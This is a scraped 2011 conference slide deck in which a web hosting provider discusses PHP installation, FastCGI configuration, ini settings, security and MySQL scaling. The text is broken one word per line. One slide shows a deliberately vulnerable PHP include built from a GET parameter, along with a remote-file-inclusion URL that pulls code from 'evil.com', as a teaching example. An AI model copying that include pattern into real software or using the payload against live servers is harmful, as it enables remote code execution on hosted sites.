The document discusses PHP from the perspective of a web hosting provider. It covers topics like installing PHP from source or using package managers, different PHP APIs like FastCGI and CLI, PHP configuration options and their security implications, PHP versions and features like PEAR and PECL, why PHP attracts many developers both skilled and unskilled, common security issues and their true causes, and scaling PHP applications by scaling up or out.
How to Troubleshoot Apps for the Modern Connected Worker
Php through the eyes of a hoster phpbnl11
1. PHP
through
the
eyes
of
a
hoster
Thijs
Feryn
Evangelist
+32
(0)9
218
79
06
thijs@combellgroup.com
PHPBenelux
Conference
Saturday
January
29th
2011
Antwerpen,
Belgium
7. I
live
in
the
wonderful
city
of
Bruges
MPBecker
-‐
Bruges
by
Night
hYp://www.flickr.com/photos/galverson2/3715965933
8. Follow
me
on
TwiYer:
@ThijsFeryn
Read
my
blog:
hYp://blog.feryn.eu
Give
me
feedback:
hYp://joind.in/2490
9.
10.
11. Chapter
I
:
The
hoster,
a
genuine
stakeholder
in
the
PHP
universe
12. Stakeholders
Customer Development
company
Endusers MGMT Devs MGMT Design PM
Internal Internal
IT PM Sales QA Systeam Consultant
Hoster PHP
community
13. Stakeholders
Somewhere
along
the
road
...
Your
app
needs
to
be
hosted
14. Goals
&
mocves
Our
goals
&
moEves
are
the
same
as
yours:
• It
has
to
work
• It
has
to
perform
• It
has
to
scale
• It
has
to
be
secure
• It
has
to
be
available
20. Installing
using
a
package
manager
(APT/Apctude)
Install
PHP:
server$
apt-‐get
install
php5
Install
MySQL
library
for
PHP:
server$
apt-‐get
install
php5-‐mysql
21. SAPI
...
schmapi
Mod_php FastCGI CLI
Web Apache
module gateway -‐
Process Apache
process php-‐cgi php
ConfiguraEon Apache
conf
files wrapper on
the
fly
shell
user
or
User Apache
user shell
user
suexec
user
22. FastCGI
Example
config:
• Apache
handler
<IfModule
mod_fcgid.c>
SuexecUserGroup
dev
dev
PHP_Fix_Pathinfo_Enable
1
<Directory
/var/www/dev/www/>
Options
+ExecCGI
AllowOverride
All
AddHandler
fcgid-‐script
.php
FCGIWrapper
/var/www/dev/etc/fcgi.wrapper
.php
Order
allow,deny
Allow
from
all
</Directory>
</IfModule>
25. INI
seengs:
tales
of
good
&
evil
Defining
INI
seengs:
• Php.ini
• Ini_set()
• “-‐d”
• php_value
• php_flag
• php_admin_value
• php_admin_flag
26. INI
seengs:
tales
of
good
&
evil
Memory_limit:
Fatal
error:
Allowed
memory
size
of
16777216
bytes
exhausted
(tried
to
allocate
35
bytes)
27.
28. INI
seengs:
tales
of
good
&
evil
Safe_mode
&
Open_basedir:
<IfModule
mod_php5.c>
php_admin_flag
engine
on
php_admin_flag
safe_mode
off
php_admin_value
open_basedir
"/var/www/vhosts/
website.com/httpdocs:/tmp"
</IfModule>
29. INI
seengs:
tales
of
good
&
evil
Allow_url_fopen:
<?php
$lang= $_GET['lang'];
require("$lang.php");
http://domain.ext/index.php?lang=http://evil.com/hack.txt?
32. PHP
4:
End
of
life,
but
far
from
dead
Parse
error:
syntax
error,
unexpected
T_STRING,
expecting
T_OLD_FUNCTION
or
T_FUNCTION
or
T_VAR
or
'}'
in
test.php
on
line
4
65. mysql>
explain
SELECT
field1,
(SELECT
COUNT(*)
FROM
table2
WHERE
field3
=
table1.id)
FROM
table1
WHERE
field2
=
1
ORDER
BY
field4
DESC
limit
12,12;
***************************
1.
row
***************************
id:
1
select_type:
PRIMARY
table:
table1
type:
ALL
possible_keys:
approved
key:
approved
key_len:
NULL
ref:
NULL
rows:
3143
Extra:
Using
where;
Using
filesort
***************************
2.
row
***************************
id:
2
select_type:
DEPENDENT
SUBQUERY
table:
table2
type:
ALL
possible_keys:
NULL
key:
NULL
key_len:
NULL
ref:
NULL
rows:
1005
Extra:
Using
where
66. mysql>
show
processlist;
+-‐-‐-‐-‐-‐-‐-‐+-‐-‐-‐-‐-‐-‐+-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐+-‐-‐-‐-‐+-‐-‐-‐-‐-‐-‐-‐-‐-‐+-‐-‐-‐-‐-‐-‐+-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐
+-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐+
|
Id
|
User
|
Host
|
db
|
Command
|
Time
|
State
|
Info
|
+-‐-‐-‐-‐-‐-‐-‐+-‐-‐-‐-‐-‐-‐+-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐+-‐-‐-‐-‐+-‐-‐-‐-‐-‐-‐-‐-‐-‐+-‐-‐-‐-‐-‐-‐+-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐
+-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐+
|
63515
|
root
|
localhost
|
db
|
Query
|
0
|
NULL
|
show
processlist
|
|
81763
|
root
|
localhost
|
db
|
Sleep
|
105
|
|
NULL
|
|
85187
|
root
|
localhost
|
db
|
Query
|
0
|
Sending
data
|
SELECT
data
from
someTable
where
field
=
'val'
|
|
82701
|
root
|
localhost
|
db
|
Query
|
0
|
Copying
to
tmp
table
|
SELECT
data
from
someTable
where
field='val2'
|
|
82709
|
root
|
localhost
|
db
|
Query
|
0
|
Sorting
result
|
SELECT
data
from
someTable
where
order
by
field
|
|
82716
|
root
|
localhost
|
db
|
Query
|
0
|
Opening
tables
|
SELECT
data
from
someOtherTable
|
+-‐-‐-‐-‐-‐-‐-‐+-‐-‐-‐-‐-‐-‐+-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐+-‐-‐-‐-‐+-‐-‐-‐-‐-‐-‐-‐-‐-‐+-‐-‐-‐-‐-‐-‐+-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐
+-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐+
74. Summary
1.Hosters
are
a
genuine
stakeholder
in
the
PHP
universe
2.PHP
is
highly
flexible
&
configurable.
Hosters
have
to
ensure
a
decent
setup
3.PHP
has
a
lot
to
offer
feature-‐wise
4.PHP
aDracts
a
crowd
and
brings
a
lot
of
people
together
from
different
industries
(e.g.
hosters)
5.Lots
of
abuse
cases
are
PHP
related,
but
that’s
not
the
fault
of
PHP
itself
6.PHP
itself
doesn’t
scale
*that*
well,
but
is
flexible
enough
to
ensure
scalability
via
extra
tools